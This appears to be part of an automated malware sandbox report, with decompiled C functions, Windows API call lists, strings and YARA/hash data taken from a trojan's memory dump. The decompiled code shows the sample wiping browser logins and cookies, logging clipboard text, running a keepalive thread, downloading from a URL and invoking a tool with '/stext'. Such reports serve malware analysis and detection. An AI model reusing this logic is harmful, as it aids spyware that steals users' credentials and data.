                                        0x0041257a
                                        0x0041257c
                                        0x0041258d
                                        0x00412591
                                        0x00412599
                                        0x0041259c
                                        0x004125a3
                                        0x004125a6
                                        0x004125a9
                                        0x004125a9
                                        0x004125bc
                                        0x004125c4
                                        0x00000000
                                        0x00000000
                                        0x004125cd
                                        0x004125d0
                                        0x004125d1
                                        0x004125d6
                                        0x004125d8
                                        0x004125df
                                        0x004125e6
                                        0x004125ec
                                        0x004125ef
                                        0x004125fa
                                        0x00412600
                                        0x0041260a
                                        0x0041260a
                                        0x0041260c
                                        0x00412615
                                        0x0041261b
                                        0x0041261e
                                        0x0041261e
                                        0x00412622
                                        0x00412624
                                        0x0041262a
                                        0x00412632
                                        0x00412638
                                        0x00412642
                                        0x00412644
                                        0x00412648
                                        0x00412652
                                        0x00412657
                                        0x0041265f

                                        APIs
                                        • InternetOpenA.WININET(user,00000001,00000000,00000000,00000000), ref: 0041257C
                                        • InternetOpenUrlA.WININET(00000000,0040E1CA,00000000,00000000,80000000,00000000), ref: 00412591
                                        • InternetReadFile.WININET(00000000,?,00002710,dVA), ref: 004125BC
                                        • ??2@YAPAXI@Z.MSVCRT ref: 004125D1
                                        • ??3@YAXPAX@Z.MSVCRT ref: 0041260C
                                        • ??2@YAPAXI@Z.MSVCRT ref: 00412624
                                        • InternetCloseHandle.WININET(?), ref: 00412652
                                        • InternetCloseHandle.WININET(00000000), ref: 00412657
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$??2@CloseHandleOpen$??3@FileRead
                                        • String ID: dVA$user
                                        • API String ID: 3314639739-756348157
                                        • Opcode ID: 2c425c2ac83949829cfd64d28bcc986e464b329bf07d6f53e08b57cf980523a3
                                        • Instruction ID: 2817f394542dad185436be8b0d9cd541a8c5b80d7f45bfec7e57154c42759719
                                        • Opcode Fuzzy Hash: 2c425c2ac83949829cfd64d28bcc986e464b329bf07d6f53e08b57cf980523a3
                                        • Instruction Fuzzy Hash: FC316A31A00229AFCF25DF68D885ADF7FA9FF49350F14406AF909D7250CA74AA90DB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004078BB, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 100sleepCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 57%
                                        			E004078BB(void* __ecx) {
				signed int _v5;
				signed int _v6;
				signed int _v7;
				signed int _v8;
				void* _t40;
				void* _t44;

				_push(__ecx);
				 *0x41b9b8 = 1;
				Sleep( *0x41b9b4);
				_v5 = _v5 & 0x00000000;
				_v6 = _v6 & 0x00000000;
				_v7 = _v7 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_t44 = 0;
				do {
					if(_v5 == 0) {
						L2:
						_v5 = E00407767();
					}
					if(_v6 == 0) {
						_v6 = E0040751B();
					}
					if(_v8 == 0) {
						_v8 = E0040728F();
					}
					if(_v7 == 0) {
						_v7 = E004071CF();
					}
					if(_t44 == 0) {
						_t44 = E0040710F();
					}
					if(_v5 == 0 || _v6 == 0 || _v7 == 0 || _t44 == 0 || _v8 == 0) {
						Sleep(0x1388);
					}
					if(_v5 == 0) {
						goto L2;
					}
				} while (_v6 == 0 || _v7 == 0 || _t44 == 0 || _v8 == 0);
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
				E00407A90("\n[Cleared browsers logins and cookies.]\n");
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
				E0041203B("[INFO]",  &_v7, "Cleared browsers logins and cookies.",  &_v8,  &_v8);
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v8);
				_t40 = E004020C2(0x41be70, 0xaf, 0x415664);
				if( *0x41b9b0 != 0) {
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					E0040B829(0x80000001, _t40, "FR", 1);
				}
				 *0x41b9b8 =  *0x41b9b8 & 0x00000000;
				return 0;
			}









                                        0x004078be
                                        0x004078cd
                                        0x004078d4
                                        0x004078d6
                                        0x004078da
                                        0x004078de
                                        0x004078e2
                                        0x004078e6
                                        0x004078e8
                                        0x004078ec
                                        0x004078ee
                                        0x004078f3
                                        0x004078f3
                                        0x004078fa
                                        0x00407901
                                        0x00407901
                                        0x00407908
                                        0x0040790f
                                        0x0040790f
                                        0x00407916
                                        0x0040791d
                                        0x0040791d
                                        0x00407922
                                        0x00407929
                                        0x00407929
                                        0x0040792f
                                        0x0040794c
                                        0x0040794c
                                        0x00407952
                                        0x00000000
                                        0x00000000
                                        0x00407954
                                        0x0040797c
                                        0x00407982
                                        0x00407992
                                        0x004079a6
                                        0x004079ac
                                        0x004079bf
                                        0x004079cf
                                        0x004079db
                                        0x004079e9
                                        0x004079f5
                                        0x004079fa
                                        0x004079fd
                                        0x00407a09

                                        APIs
                                        • Sleep.KERNEL32 ref: 004078D4
                                        • Sleep.KERNEL32(00001388), ref: 0040794C
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Cleared browsers logins and cookies.],?), ref: 0040797C
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Cleared browsers logins and cookies.,?), ref: 00407992
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 004079A6
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 004079BF
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0041601C,00000001,000000AF), ref: 004079E9
                                          • Part of subcall function 00407767: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000,73B76490,00000000), ref: 00407779
                                          • Part of subcall function 00407767: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004077A1
                                          • Part of subcall function 00407767: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004077AA
                                          • Part of subcall function 00407767: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664), ref: 004077B9
                                          • Part of subcall function 00407767: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([IE cookies cleared!],00000000), ref: 00407867
                                          • Part of subcall function 00407767: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004078AF
                                        Strings
                                        • [Cleared browsers logins and cookies.], xrefs: 00407977
                                        • [INFO], xrefs: 004079A1
                                        • Cleared browsers logins and cookies., xrefs: 0040798D
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@D@1@@$??1?$basic_string@Sleep$??4?$basic_string@??8std@@?c_str@?$basic_string@D@2@@0@V01@V01@@V?$basic_string@
                                        • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.$[INFO]
                                        • API String ID: 3797260644-945983296
                                        • Opcode ID: 45270c95517eca423c77cf062f5531907de28195bb0046b705c141155823f916
                                        • Instruction ID: 70147e8437466b13765d015bb4740f5a08e73b30c638215b5aa9753a2d15767b
                                        • Opcode Fuzzy Hash: 45270c95517eca423c77cf062f5531907de28195bb0046b705c141155823f916
                                        • Instruction Fuzzy Hash: 733146B1D5D28879FB11F3E5890ABED7EA48B51354F1880ABD840222D2C7BD1A88D35B
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00406C35, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 68COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 31%
                                        			E00406C35(void* __ecx) {
				char _v5;
				char _v24;
				char _v40;
				char* _t13;
				void* _t18;
				void* _t34;

				_t18 = __ecx;
				if(( *0x41b8f8 & 0x00000001) == 0) {
					 *0x41b8f8 =  *0x41b8f8 | 0x00000001;
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
					E00413E72(E00406CF4);
				}
				E00406BEF(_t18,  &_v24);
				_t13 =  &_v24;
				__imp__??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z(_t13, 0x41b8e8);
				if(_t13 == 0) {
					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v24);
					_t13 =  &_v24;
					__imp__??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z(_t13, 0x415664);
					if(_t13 != 0) {
						L00414176();
						L00414170();
						_t13 = E004054E9(_t18, _t34 - 0x10,  &_v40,  &_v40, "\r\n[Following text has been copied to clipboard:]\r\n", 0x41b8e8);
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ("\r\n[End of clipboard text]\r\n", 0);
					}
				}
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return _t13;
			}









                                        0x00406c45
                                        0x00406c4c
                                        0x00406c4e
                                        0x00406c5b
                                        0x00406c66
                                        0x00406c6b
                                        0x00406c72
                                        0x00406c7c
                                        0x00406c81
                                        0x00406c8b
                                        0x00406c93
                                        0x00406c99
                                        0x00406ca2
                                        0x00406cac
                                        0x00406cc4
                                        0x00406cce
                                        0x00406cd8
                                        0x00406ce0
                                        0x00406ce0
                                        0x00406cac
                                        0x00406ce9
                                        0x00406cf3

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,00000000,00000000,?,?,?,?,?,00405AF6), ref: 00406C5B
                                        • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP60(?,0041B8E8,?,?,00000000,00000000,?,?,?,?,?,00405AF6), ref: 00406C81
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,00405AF6), ref: 00406C93
                                        • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664,?,?,?,00405AF6), ref: 00406CA2
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[Following text has been copied to clipboard:],0041B8E8,[End of clipboard text]), ref: 00406CC4
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,[End of clipboard text]), ref: 00406CCE
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text]), ref: 00406CE0
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00405AF6), ref: 00406CE9
                                        Strings
                                        • [End of clipboard text], xrefs: 00406CB8
                                        • [Following text has been copied to clipboard:], xrefs: 00406CBE
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@V?$basic_string@$D@2@@0@$??1?$basic_string@Hstd@@$??0?$basic_string@??4?$basic_string@??8std@@??9std@@D@1@@D@2@@0@0@V01@V01@@V10@V10@@
                                        • String ID: [End of clipboard text]$[Following text has been copied to clipboard:]
                                        • API String ID: 1191203583-3441917614
                                        • Opcode ID: 33ee1aab2d947228c589f5a2726d23556808232515a381d0ba99c9c06a6ea012
                                        • Instruction ID: f0c7cb0c0afa7c9892d6ee07c4285c518a0e55952a049bef315af4c10592b83c
                                        • Opcode Fuzzy Hash: 33ee1aab2d947228c589f5a2726d23556808232515a381d0ba99c9c06a6ea012
                                        • Instruction Fuzzy Hash: F511BC71A00209A7CB04E7A5ED49EEF77BCDB95755B10403BF402B3191DB7889898769
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00402580, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 66timethreadCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 37%
                                        			E00402580(void* __ecx, intOrPtr _a4, intOrPtr _a8, char _a11) {
				struct _SYSTEMTIME _v20;
				char _v36;
				void* _v52;
				char* _t25;
				char* _t26;
				intOrPtr _t35;
				void* _t37;

				_t37 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x38)) != 0) {
					__eflags = 0;
					return 0;
				}
				_t35 = _a4;
				if(_a8 != 0) {
					__eflags =  *0x41bcac; // 0x0
					if(__eflags != 0) {
						GetLocalTime( &_v20);
						_t25 =  &_a11;
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("%02i:%02i:%02i:%03i [INFO] ", _t25, "KeepAlive Enabled! Timeout: %i seconds\n", _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff, _v20.wSecond & 0x0000ffff, _v20.wMilliseconds & 0x0000ffff, _t35);
						_t26 =  &_v36;
						L00414170();
						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t26, _t25);
						printf(_t26);
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					}
				} else {
					 *((char*)(__ecx + 0x44)) = 1;
				}
				 *((char*)(_t37 + 0x38)) = 1;
				 *((intOrPtr*)(_t37 + 0x3c)) = _t35;
				CreateThread(0, 0, E004027A2, _t37, 0, 0);
				return 1;
			}










                                        0x00402588
                                        0x0040258f
                                        0x0040262f
                                        0x00000000
                                        0x0040262f
                                        0x00402599
                                        0x0040259c
                                        0x004025a4
                                        0x004025aa
                                        0x004025b0
                                        0x004025ce
                                        0x004025dc
                                        0x004025e3
                                        0x004025e7
                                        0x004025f1
                                        0x004025f8
                                        0x00402604
                                        0x0040260d
                                        0x0040260d
                                        0x0040259e
                                        0x0040259e
                                        0x0040259e
                                        0x0040261d
                                        0x00402621
                                        0x00402624
                                        0x00000000

                                        APIs
                                        • GetLocalTime.KERNEL32(?,00000001,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,0040CAF3,0000000A,00000000), ref: 004025B0
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [INFO] ,?,KeepAlive Enabled! Timeout: %i seconds,0000000A,?,00000000,?,0000000A), ref: 004025DC
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,0040CAF3,0000000A,00000000), ref: 004025E7
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,0040CAF3,0000000A,00000000), ref: 004025F1
                                        • printf.MSVCRT ref: 004025F8
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402604
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040260D
                                        • CreateThread.KERNEL32(00000000,00000000,004027A2,0041BE70,00000000,00000000), ref: 00402624
                                        Strings
                                        • %02i:%02i:%02i:%03i [INFO] , xrefs: 004025D7
                                        • KeepAlive Enabled! Timeout: %i seconds, xrefs: 004025D1
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@CreateD@1@@D@2@@0@Hstd@@LocalThreadTimeV10@V?$basic_string@printf
                                        • String ID: %02i:%02i:%02i:%03i [INFO] $KeepAlive Enabled! Timeout: %i seconds
                                        • API String ID: 3715082883-586133315
                                        • Opcode ID: 51604d627dacd7a8ae8a3435ef703a50610ed316e6cde58bd2f1e49f68c81dc1
                                        • Instruction ID: a312a60622e34753c5bc094497f25c33392341c8bb354fb046c7070d615c6ac2
                                        • Opcode Fuzzy Hash: 51604d627dacd7a8ae8a3435ef703a50610ed316e6cde58bd2f1e49f68c81dc1
                                        • Instruction Fuzzy Hash: A611EB71800258FFCB119BE1DC48DFFBBBCAB95705B004426F842A3190D6B99944CB68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00411A24, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 64COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0041358B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040969A,?,?), ref: 0041359B
                                          • Part of subcall function 0041358B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,0040969A,?,?), ref: 004135B2
                                          • Part of subcall function 0041358B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135CA
                                          • Part of subcall function 0041358B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135D3
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00411A41
                                        • PathFileExistsW.SHLWAPI(00000000), ref: 00411A48
                                        • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041C1C0,00415664), ref: 00411A61
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00416B00,?), ref: 00411A84
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00416B00,?), ref: 00411AA9
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00411ABE
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041C1C0), ref: 00411ACB
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00411ADC
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00411AEC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@G@2@@std@@G@std@@$D@2@@std@@$??0?$basic_string@?c_str@?$basic_string@$??1?$basic_string@D@1@@$??8std@@D@2@@0@ExistsFilePathV01@@V?$basic_string@
                                        • String ID: alarm.wav
                                        • API String ID: 3304909635-4094641389
                                        • Opcode ID: bebabaa453ebb8ad60829e5f1d269cc78c12b9cc97e436605a7a08e32ec2c8ef
                                        • Instruction ID: 963edfdf3fd52f0052b6b10baeb02962c7ef6d970aeca7efa99f7092008c0f7b
                                        • Opcode Fuzzy Hash: bebabaa453ebb8ad60829e5f1d269cc78c12b9cc97e436605a7a08e32ec2c8ef
                                        • Instruction Fuzzy Hash: 4E11E931A41608E7CB04F7F5DD4AAEE3B38DF44342F504066F912930E1DBA85A84C6AE
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040AD6F, Relevance: 16.6, APIs: 11, Instructions: 78COMMON
                                        Download Yara Rule
                                        APIs
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AD79
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6F5E5DF0), ref: 0040AD91
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(Function_0001B310), ref: 0040ADA1
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040ADB0
                                          • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                          • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                          • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                          • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040ADDB
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040ADF1
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040AE07
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040AE1D
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040AE33
                                          • Part of subcall function 0040AE6A: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040AE88
                                          • Part of subcall function 0040AE6A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEA4
                                          • Part of subcall function 0040AE6A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEB4
                                          • Part of subcall function 0040AE6A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEC1
                                          • Part of subcall function 0040AE6A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AED3
                                          • Part of subcall function 0040AE6A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AEEB
                                          • Part of subcall function 0040AE6A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AEFD
                                          • Part of subcall function 0040AE6A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF18
                                          • Part of subcall function 0040AE6A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AF2A
                                          • Part of subcall function 0040AE6A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF42
                                          • Part of subcall function 0040AE6A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AF4B
                                          • Part of subcall function 0040AE6A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040AF69
                                          • Part of subcall function 0040AE6A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040AF7B
                                          • Part of subcall function 0040AE6A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040AF88
                                          • Part of subcall function 0040AE6A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040AF95
                                          • Part of subcall function 004020F4: closesocket.WS2_32(0041BE70), ref: 004020F9
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AE56
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AE5F
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@$V01@@$?c_str@?$basic_string@$D@1@@G@std@@$?length@?$basic_string@G@2@@0@Hstd@@V12@V?$basic_string@$?substr@?$basic_string@$??4?$basic_string@?find@?$basic_string@FileG@1@@G@2@@std@@ModuleNameV01@V10@V10@0@V10@@closesocket
                                        • String ID:
                                        • API String ID: 1795822965-0
                                        • Opcode ID: 577d363030fa7591e52d31dd8c7d90d933b05a2efaa5bb55a7e707ed632d8bb6
                                        • Instruction ID: 48313c0a065dcb0dcea7f82e9129112a0e8bb123b90d7e9a0fd4ac289fd1d0c5
                                        • Opcode Fuzzy Hash: 577d363030fa7591e52d31dd8c7d90d933b05a2efaa5bb55a7e707ed632d8bb6
                                        • Instruction Fuzzy Hash: D3216271A0010DABCB04BBB5DD5A9EE3778EF44341F408569E922A71E1EF745604CB9A
